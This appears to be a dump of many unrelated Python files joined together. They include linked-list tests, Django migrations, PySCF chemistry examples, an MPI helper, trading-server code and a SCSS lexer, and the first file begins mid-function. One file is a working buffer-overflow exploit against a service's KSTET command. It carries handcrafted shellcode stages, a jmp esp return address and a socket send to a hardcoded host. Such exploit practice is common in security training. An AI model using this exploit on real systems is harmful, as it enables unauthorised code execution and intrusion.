num in intersection: output.append(num) return output # Union test case 1 - union exists linked_list_1 = LinkedList() linked_list_2 = LinkedList() element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21] element_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1] solution = [1, 2, 3, 4, 6, 9, 11, 21, 32, 35, 65] for i in element_1: linked_list_1.append(i) for j in element_2: linked_list_2.append(j) output = union(linked_list_1, linked_list_2) output_list = [] while output.head: output_list.append(output.pop().value) output_list.sort() if output_list == solution: print("Test case 1 union: Pass!") else: print("Test case 1 union: FAIL.") # Intersection test case 1 - intersection exists linked_list_1 = LinkedList() linked_list_2 = LinkedList() element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 21] element_2 = [6, 32, 4, 9, 6, 1, 11, 21, 1] solution = [4, 6, 21] for i in element_1: linked_list_1.append(i) for j in element_2: linked_list_2.append(j) output = intersection(linked_list_1, linked_list_2) output_list = [] while output.head: num = output.pop().value output_list.append(num) if sorted(output_list) == solution: print("Test case 1 intersection: Pass!") else: print("Test case 1 intersection: FAIL.") # Union test case 2 - union exists linked_list_3 = LinkedList() linked_list_4 = LinkedList() element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23] element_2 = [1, 7, 8, 9, 11, 21, 1] solution = [1, 2, 3, 4, 6, 7, 8, 9, 11, 21, 23, 35, 65] for i in element_1: linked_list_3.append(i) for i in element_2: linked_list_4.append(i) output = union(linked_list_3, linked_list_4) output_list = [] while output.head: output_list.append(output.pop().value) if sorted(output_list) == solution: print("Test case 2 union: Pass!") else: print("Test case 2 union: FAIL.") # Intersection test case 2 - intersection does not exist linked_list_3 = LinkedList() linked_list_4 = LinkedList() element_1 = [3, 2, 4, 35, 6, 65, 6, 4, 3, 23] element_2 = [1, 7, 8, 9, 11, 21, 1] solution = [] for i in element_1: linked_list_3.append(i) for i in element_2: linked_list_4.append(i) output = intersection(linked_list_1, linked_list_2) output_list = [] while output.head: output_list.append(output.pop().value) if sorted(output_list) == solution: print("Test case 2 intersection: Pass!") else: print("Test case 2 intersection: FAIL.") # Union test case 3 - union of empty sets linked_list_3 = LinkedList() linked_list_4 = LinkedList() element_1 = [] element_2 = [] solution = [] for i in element_1: linked_list_3.append(i) for i in element_2: linked_list_4.append(i) output = union(linked_list_3, linked_list_4) output_list = [] while output.head: output_list.append(output.pop().value) if sorted(output_list) == solution: print("Test case 3 union: Pass!") else: print("Test case 3 union: FAIL.") # Intersection test case 3 - intersection of empty sets linked_list_3 = LinkedList() linked_list_4 = LinkedList() element_1 = [] element_2 = [] solution = [] for i in element_1: linked_list_3.append(i) for i in element_2: linked_list_4.append(i) output = intersection(linked_list_1, linked_list_2) output_list = [] while output.head: output_list.append(output.pop().value) if sorted(output_list) == solution: print("Test case 3 intersection: Pass!") else: print("Test case 3 intersection: FAIL.")
nilq/baby-python
python
# Generated by Django 2.2.12 on 2020-07-18 19:09 import ckeditor.fields from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', '0019_order_refrence_code'), ] operations = [ migrations.AlterField( model_name='historicalitem', name='additional_info', field=ckeditor.fields.RichTextField(blank=True, null=True), ), migrations.AlterField( model_name='historicalitem', name='description', field=ckeditor.fields.RichTextField(), ), migrations.AlterField( model_name='item', name='additional_info', field=ckeditor.fields.RichTextField(blank=True, null=True), ), migrations.AlterField( model_name='item', name='description', field=ckeditor.fields.RichTextField(), ), ]
nilq/baby-python
python
import unittest import math_module class TestMath(unittest.TestCase): def setUp(self): self.zir = math_module.Analysis('test_zircon', 15, (0.2003, 0.0008, 0.0046), (2.082, 0.009, 0.07), 0.6, 0.6, (0.0617, 0.0003, 0.0003), (0.758, 0.0003, 0.0015), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), (0, 0, 0), 1) def tearDown(self): pass def test_calc_ratio(self): result = math_module.calc_ratio(1000)[0] self.assertEqual(result, 0.16780392747297124) def test_analysis(self): self.assertEqual(round(self.zir.calc_age(0)[0], 0), 1177) if __name__ == '__main__': unittest.main()
nilq/baby-python
python
PATHS = dict( REPOS_FILE = 'config/repos.json', DAILY_REPORTS_PATH = 'reports/daily', WEEKLY_REPORTS_PATH = 'reports/weekly' )
nilq/baby-python
python
from django.contrib import admin from ddweb.apps.references.models import Reference class ReferenceAdmin(admin.ModelAdmin): list_display = ( "ship", "year", "description", "ongoing", "beforeDD", "image_admin_url", ) def image_admin_url(self, obj): return '<a href="/images/uploadf/reference/%s">Upload images</a>' % obj.id image_admin_url.allow_tags = True admin.site.register(Reference, ReferenceAdmin)
nilq/baby-python
python
#!/usr/bin/env python import numpy import numpy.linalg from pyscf import gto, scf, mcscf mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)], unit='Bohr', basis='ccpvtz') # # A regular SCF calculation for this sytem will raise a warning message # # Warn: Singularity detected in overlap matrix (condition number = 5.47e+09). SCF may be inaccurate and hard to converge. # # The linear dependency can cause HF, MCSCF etc methods converging to wrong # answer. This example shows how to remove linear dependency from overlap # matrix and use the linearly independent basis in the HF, MCSCF calculations. # # There is a shortcut function to remove linear-dependency, eg # # mf = scf.RHF(mol).apply(scf.addons.remove_linear_dep_) # # This example demonstrated how the linear dependency is removed in our # implementation. # # # The smallest eigenvalue of overlap matrix is 10^{-9} # s = mol.intor('cint1e_ovlp_sph') print(numpy.linalg.eigh(s)[0][:8]) #[ 1.96568587e-09 8.58358923e-08 7.86870520e-07 1.89728026e-06 # 2.14355169e-06 8.96267338e-06 2.46812168e-05 3.26534277e-05] def eig(h, s): d, t = numpy.linalg.eigh(s) # Removing the eigenvectors assoicated to the smallest eigenvalue, the new # basis defined by x matrix has 139 vectors. x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8]) xhx = reduce(numpy.dot, (x.T, h, x)) e, c = numpy.linalg.eigh(xhx) c = numpy.dot(x, c) # Return 139 eigenvalues and 139 eigenvectors. return e, c # # Replacing the default eig function with the above one, the HF solver # generate only 139 canonical orbitals # mf = scf.RHF(mol) mf.eig = eig mf.verbose = 4 mf.kernel() # # The CASSCF solver takes the HF orbital as initial guess. The MCSCF problem # size is (0 core, 10 active, 129 external) orbitals. This information can be # found in the output. # mc = mcscf.CASSCF(mf, 10, 10) mc.verbose = 4 mc.kernel() # # For symmetry adapted calculation, similar treatments can be applied. # # Here by assigning symmetry=1, mol.irrep_name, mol.irrep_id and mol.symm_orb # (see pyscf/gto/mole.py) are initialized in the mol object. They are the # irrep symbols, IDs, and symmetry-adapted-basis. # mol = gto.M(atom=['H 0 0 %f'%i for i in range(10)], unit='Bohr', basis='ccpvtz', symmetry=1) # # The smallest eigenvalue is associated to A1u irrep. Removing the relevant # basis will not break the symmetry # s = mol.intor('cint1e_ovlp_sph') for i, c in enumerate(mol.symm_orb): s1 = reduce(numpy.dot, (c.T, s, c)) print(mol.irrep_name[i], numpy.linalg.eigh(s1)[0]) #A1g [ 8.58358928e-08 2.14355169e-06 2.46812168e-05 3.26534277e-05 #... #E1gx [ 1.67409011e-04 2.38132838e-03 4.51022127e-03 9.89429994e-03 #... #E1gy [ 1.67409011e-04 2.38132838e-03 4.51022127e-03 9.89429994e-03 #... #A1u [ 1.96568605e-09 7.86870519e-07 1.89728026e-06 8.96267338e-06 #... # pyscf/scf/hf_symm.py def eig(h, s): from pyscf import symm nirrep = len(mol.symm_orb) h = symm.symmetrize_matrix(h, mol.symm_orb) s = symm.symmetrize_matrix(s, mol.symm_orb) cs = [] es = [] # # Linear dependency are removed by looping over different symmetry irreps. # for ir in range(nirrep): d, t = numpy.linalg.eigh(s[ir]) x = t[:,d>1e-8] / numpy.sqrt(d[d>1e-8]) xhx = reduce(numpy.dot, (x.T, h[ir], x)) e, c = numpy.linalg.eigh(xhx) cs.append(reduce(numpy.dot, (mol.symm_orb[ir], x, c))) es.append(e) e = numpy.hstack(es) c = numpy.hstack(cs) return e, c mf = scf.RHF(mol) mf.eig = eig mf.verbose = 4 mf.kernel() mc = mcscf.CASSCF(mf, 10, 10) mc.verbose = 4 mc.kernel()
nilq/baby-python
python
from numpy import prod def persistence(n): if n < 10: return 0 nums = [int(x) for x in str(n)] steps = 1 while prod(nums) > 9: nums = [int(x) for x in str(int(prod(nums)))] steps += 1 return steps
nilq/baby-python
python
#!/usr/bin/python # -*- coding: utf-8 -*- import sys import socket from time import sleep from struct import * host= "172.30.200.66" port = 9999 payload = "" # Estagio 2 -> Realinhamento da pilha para encontrar o FileDescriptor payload += "\x54" # push esp payload += "\x59" # pop ecx payload += "\x66\x81\xE9\x44\x01" # sub cx,0x144 # Reajusta a posição de ESP # como o ESP (pilha) está abaixo deste payload, iremos reajustar para uma posição acima payload += "\x83\xEC\x50" # sub esp 50 # Estagio 3 -> Calcular parametros do recv # int recv( SOCKET s, char *buf, int len, int flags ); # Adiciona o 4 parametro (flags) payload += "\x31\xC0" # xor eax,eax --> Zera EAX payload += "\x50" # push eax # Adiciona o 3 parametro (int) payload += "\x31\xC0" # xor eax,eax --> Zera EAX payload += "\xB0\x08" # mov al,0x8 payload += "\xB4\x02" # mov ah,0x2 payload += "\x50" # push eax --> EAX deve ter o valor 0x00000208 decimal 520 # Adiciona o 2 parametro (*buf), ou seja endereço do Buffer payload += "\x54" # push esp payload += "\x5A" # pop edx payload += "\x83\xC2\x50" # ADD EDX, 50 payload += "\x52" # push edx # Adiciona o 1 parametro (socket) payload += "\xFF\x31" # PUSH DWORD PTR DS:[ECX] payload += "\xCC" # Breakpoint payload += "\x90" * (66 - len(payload)) # preenche com NOPs payload += pack('<L',0x625011af) # 0x625011af : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (essfunc.dll) # Estagio 1 -> JMP para o inicio do nosso payload (AAAA...) payload += "\x54" # push esp payload += "\x5A" # pop edx payload += "\x83\xEA\x46" # sub edx,byte +0x46 payload += "\xFF\xE2" # jmp edx buffer = b"KSTET /.:/" buffer += payload shellcode = "E" * 520 print "[*] Enviando requisicao maliciosa ... :)" exp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) exp.connect((host,port)) exp.recv(4096) exp.send(buffer) exp.close()
nilq/baby-python
python
from mpi4py import MPI comm = MPI.COMM_WORLD rank = comm.Get_rank() size = comm.Get_size() import numpy as np ################################################################################ ### ### USAGE ### list_of_objects = parutil.init(list_of_object) ### ### DO WHAT YOU WANT ### list_of object = parutil.finish(list_of_objects) ### ################################################################################ def init(iterable): iterable = scatter(iterable) return iterable def finish(iterable, barrier=True): iterable = bcast(gather(iterable)) if barrier: comm.Barrier() return iterable def scatter(iterable): """Scatter iterable as chunks to the cores. N.B.: len(iterable) == size after scattering!""" iterable = comm.scatter(chop(iterable)) return iterable def gather(iterable, keep_order=True, keep_type=True): iterable = comm.gather(iterable) if rank == 0: itertype = type(iterable) iterable = sum(iterable,[]) if keep_order: natural = range(len(iterable)) mixed = chop(natural) try: mixed = sum(mixed,[]) except TypeError: ### list elements are generators! mixed = [list(i) for i in mixed] mixed = sum(mixed,[]) order = np.argsort(mixed) iterable = np.array(iterable)[order] if keep_type == True: if itertype in [list, tuple, set, frozenset]: iterable = itertype(iterable) elif itertype is not np.ndarray: raise NotImplementedError("NOT TESTED") return iterable def bcast(iterable): iterable = comm.bcast(iterable) return iterable def chop(iterable): """Chop an iterable into (quasi)-equally long chunks. Automatically handle non-multiplier! ( len(iterable)%size != 0 ) Core function for parallelization""" chunks = [iterable[i::size] for i in range(size)] return chunks
nilq/baby-python
python
#!/usr/bin/env python import argparse parser = argparse.ArgumentParser() parser.add_argument("-i", "--input", type=str, help="database file input") parser.add_argument("-o", "--output", type=str, help="filtered fasta output") parser.add_argument("-k", "--keyword", type=str, help="filter records to include keyword") args = parser.parse_args() rec_dict = {} with open(args.input, "r") as ifile: line = ifile.readline() while line != "": header = line line = ifile.readline() seq = "" while line != "" and line[0] != ">": seq += line.strip() line = ifile.readline() rec_dict[header] = seq with open(args.output, "w") as ofile: for rec in rec_dict.keys(): if args.keyword in rec: ofile.write(F"{rec}{rec_dict[rec]}\n")
nilq/baby-python
python
# PyAlgoTrade # # Copyright 2011-2018 Gabriel Martin Becedillas Ruiz # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com> """ import threading import time from six.moves import xmlrpc_server import pyalgotrade.logger from pyalgotrade.optimizer import base from pyalgotrade.optimizer import serialization logger = pyalgotrade.logger.getLogger(__name__) class AutoStopThread(threading.Thread): def __init__(self, server): super(AutoStopThread, self).__init__() self.__server = server def run(self): while self.__server.jobsPending(): time.sleep(1) self.__server.stop() class Job(object): def __init__(self, strategyParameters): self.__strategyParameters = strategyParameters self.__bestResult = None self.__bestParameters = None self.__id = id(self) def getId(self): return self.__id def getNextParameters(self): ret = None if len(self.__strategyParameters): ret = self.__strategyParameters.pop() return ret # Restrict to a particular path. class RequestHandler(xmlrpc_server.SimpleXMLRPCRequestHandler): rpc_paths = ('/PyAlgoTradeRPC',) class Server(xmlrpc_server.SimpleXMLRPCServer): def __init__(self, paramSource, resultSinc, barFeed, address, port, autoStop=True, batchSize=200): assert batchSize > 0, "Invalid batch size" xmlrpc_server.SimpleXMLRPCServer.__init__( self, (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True ) # super(Server, self).__init__( # (address, port), requestHandler=RequestHandler, logRequests=False, allow_none=True # ) self.__batchSize = batchSize self.__paramSource = paramSource self.__resultSinc = resultSinc self.__barFeed = barFeed self.__instrumentsAndBars = None # Serialized instruments and bars for faster retrieval. self.__barsFreq = None self.__activeJobs = {} self.__lock = threading.Lock() self.__startedServingEvent = threading.Event() self.__forcedStop = False self.__bestResult = None if autoStop: self.__autoStopThread = AutoStopThread(self) else: self.__autoStopThread = None self.register_introspection_functions() self.register_function(self.getInstrumentsAndBars, 'getInstrumentsAndBars') self.register_function(self.getBarsFrequency, 'getBarsFrequency') self.register_function(self.getNextJob, 'getNextJob') self.register_function(self.pushJobResults, 'pushJobResults') def getInstrumentsAndBars(self): return self.__instrumentsAndBars def getBarsFrequency(self): return str(self.__barsFreq) def getNextJob(self): ret = None with self.__lock: # Get the next set of parameters. params = [p.args for p in self.__paramSource.getNext(self.__batchSize)] # Map the active job if len(params): ret = Job(params) self.__activeJobs[ret.getId()] = ret return serialization.dumps(ret) def jobsPending(self): if self.__forcedStop: return False with self.__lock: jobsPending = not self.__paramSource.eof() activeJobs = len(self.__activeJobs) > 0 return jobsPending or activeJobs def pushJobResults(self, jobId, result, parameters, workerName): jobId = serialization.loads(jobId) result = serialization.loads(result) parameters = serialization.loads(parameters) # Remove the job mapping. with self.__lock: try: del self.__activeJobs[jobId] except KeyError: # The job's results were already submitted. return if self.__bestResult is None or result > self.__bestResult: logger.info("Best result so far %s with parameters %s" % (result, parameters)) self.__bestResult = result self.__resultSinc.push(result, base.Parameters(*parameters)) def waitServing(self, timeout=None): return self.__startedServingEvent.wait(timeout) def stop(self): self.shutdown() def serve(self): assert len(self.__barFeed.getAllFrequencies()) == 1 try: # Initialize instruments, bars and parameters. logger.info("Loading bars") loadedBars = [] for dateTime, bars, freq in self.__barFeed: loadedBars.append(bars) instruments = self.__barFeed.getRegisteredInstruments() self.__instrumentsAndBars = serialization.dumps((instruments, loadedBars)) self.__barsFreq = self.__barFeed.getAllFrequencies()[0] if self.__autoStopThread: self.__autoStopThread.start() logger.info("Started serving") self.__startedServingEvent.set() self.serve_forever() logger.info("Finished serving") if self.__autoStopThread: self.__autoStopThread.join() finally: self.__forcedStop = True
nilq/baby-python
python
""" Custom SCSS lexer ~~~~~~~~~~~~~~~~~ This is an alternative to the Pygments SCSS lexer which is broken. Note, this SCSS lexer is also broken, but just a bit less broken. """ import re from pygments.lexer import ExtendedRegexLexer from pygments.lexers.css import ( bygroups, copy, Comment, default, include, iteritems, Keyword, Name, Operator, Punctuation, String, Text) from pygments.lexers.css import ScssLexer as DefaultScssLexer class ScssLexer(ExtendedRegexLexer): """ For SCSS stylesheets. """ name = 'SCSS2' aliases = ['scss2'] filenames = ['*.scss'] mimetypes = ['text/x-scss'] flags = re.IGNORECASE | re.DOTALL def selector_callback(self, match, ctx): ctx.pos = match.start() stack = ctx.stack ctx.stack = ['selector'] analyses = [] try: for pos, token, text in self.get_tokens_unprocessed(context=ctx): analyses.append((pos, token, text)) except IndexError: pass text = ''.join(analysis[-1] for analysis in analyses).strip() if text and text[-1] in ';}': analyses = [] ctx.pos = match.start() ctx.stack = ['attribute'] try: for pos, token, text in self.get_tokens_unprocessed(context=ctx): analyses.append((pos, token, text)) except IndexError: pass for pos, token, text in analyses: yield pos, token, text ctx.stack = stack ctx.pos = pos + len(text) tokens = {} for group, common in iteritems(DefaultScssLexer.tokens): tokens[group] = copy.copy(common) tokens['root'] = [ (r'\s+', Text), (r'//.*?\n', Comment.Single), (r'/\*.*?\*/', Comment.Multiline), (r'@import', Keyword, 'value'), (r'@for', Keyword, 'for'), (r'@if', Keyword, 'condition'), (r'@while', Keyword, 'condition'), (r'@else', Keyword), (r'@(debug|warn|if|while)', Keyword, 'value'), (r'(@mixin)( [\w-]+)', bygroups(Keyword, Name.Function), 'value'), (r'(@include)( [\w-]+)', bygroups(Keyword, Name.Decorator), 'value'), (r'@extend', Keyword, 'selector'), (r'(@media)(\s+)', bygroups(Keyword, Text), 'value'), (r'@[\w-]+', Keyword, 'selector'), (r'(\$[\w-]*\w)([ \t]*:)', bygroups(Name.Variable, Operator), 'value'), (r'[{}]', Punctuation), (r'[\w\.#]', selector_callback), ] tokens['selector'] = [ (r'[ \t]+', Text), (r'\:', Name.Decorator, 'pseudo-class'), (r'\.', Name.Class, 'class'), (r'#\{', String.Interpol, 'interpolation'), (r'\#', Name.Namespace, 'id'), (r'[\w-]+', Name.Tag), (r'[~^*!&\[\]()<>|+=@:./?-]', Operator), (r'"', String.Double, 'string-double'), (r"'", String.Single, 'string-single'), (r'[,{;]', Punctuation, '#pop') ] tokens['attribute'] = [ (r'\s+', Text), (r'[\w-]+', Name.Attribute), (r'#\{', String.Interpol, 'interpolation'), (r'[:]', Operator, 'value'), (r'\}', Punctuation, '#pop') ] tokens['condition'] = [ (r'[!%()<>+=-]', Operator), include('value'), default('#pop')] tokens['else'] = [('if', Keyword, 'condition'), default('#pop')] tokens['value'].append((r'\$[\w-]', Name.Variable)) tokens['value'].append((r'}', Punctuation, '#pop')) tokens['pseudo-class'] = [ (r'[\w-]+', Name.Decorator), (r'#\{', String.Interpol, 'interpolation'), include('value'), default('#pop'), ]
nilq/baby-python
python
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Create a fastq file from fasta file with fake quality values all equal. """ import sys from Bio import SeqIO # Get inputs fa_path = sys.argv[1] fq_path = sys.argv[2] # Make fastq with open(fa_path, "rb") as fasta, open(fq_path, "wb") as fastq: for record in SeqIO.parse(fasta, "fasta"): record.letter_annotations["phred_quality"] = [40] * len(record) SeqIO.write(record, fastq, "fastq")
nilq/baby-python
python
from Common import * import os photos = set() async def save_photo(photo): id = photo.id if id not in photos: await bot.download_media(photo, get_path(id)) photos.add(id) return get_path(id) def rename_to_id(name, id): os.rename(get_path(name), get_path(id)) photos.add(id) def get_id(path): return os.path.splitext(os.path.basename(path))[0] def get_path(name): name = str(name) if name.startswith(os.path.join('tmp', '')): return name return os.path.join('tmp', name + '.jpg') def clear_tmp(): photos.clear() for filename in os.listdir('tmp'): os.remove(os.path.join('tmp', filename)) def fix_tmp(): if not os.path.exists('tmp'): os.mkdir('tmp') if len(os.listdir('tmp')) > 200: clear_tmp()
nilq/baby-python
python
from beem import Steem stm = Steem() print(stm.get_config(1)["STEEMIT_MAX_PERMLINK_LENGTH"]) print(stm.get_config()["STEEMIT_MIN_PERMLINK_LENGTH"])
nilq/baby-python
python
from http.server import HTTPServer, SimpleHTTPRequestHandler, BaseHTTPRequestHandler from zipreport.cli.debug.server import DebugServer class DebugServerHandler(BaseHTTPRequestHandler): def __init__(self, *args, report=None, **kwargs): self._report = report super().__init__(*args, **kwargs) def do_GET(self): self.send_response(200) self.end_headers() print(self.path) print("Received:", self.command, self.path) self.wfile.write(b'Hello, world!') def do_POST(self): content_length = int(self.headers['Content-Length']) body = self.rfile.read(content_length) self.send_response(200) self.end_headers() response = BytesIO() response.write(b'This is POST request. ') response.write(b'Received: ') response.write(body) self.wfile.write(response.getvalue()) #server_address = ('', 8000) #httpd = HTTPServer(server_address, DebugServerHandler) #httpd.report = "tadaa" #httpd.serve_forever() server = DebugServer() server.run('./examples/reports/newsletter')
nilq/baby-python
python
# Generated by Django 3.2.7 on 2021-11-23 16:39 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('blog', '0001_initial'), migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.AddField( model_name='comment', name='user_comment', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_comment', to=settings.AUTH_USER_MODEL, verbose_name='User'), ), migrations.AddField( model_name='blog', name='category', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.category', verbose_name='Category'), ), ]
nilq/baby-python
python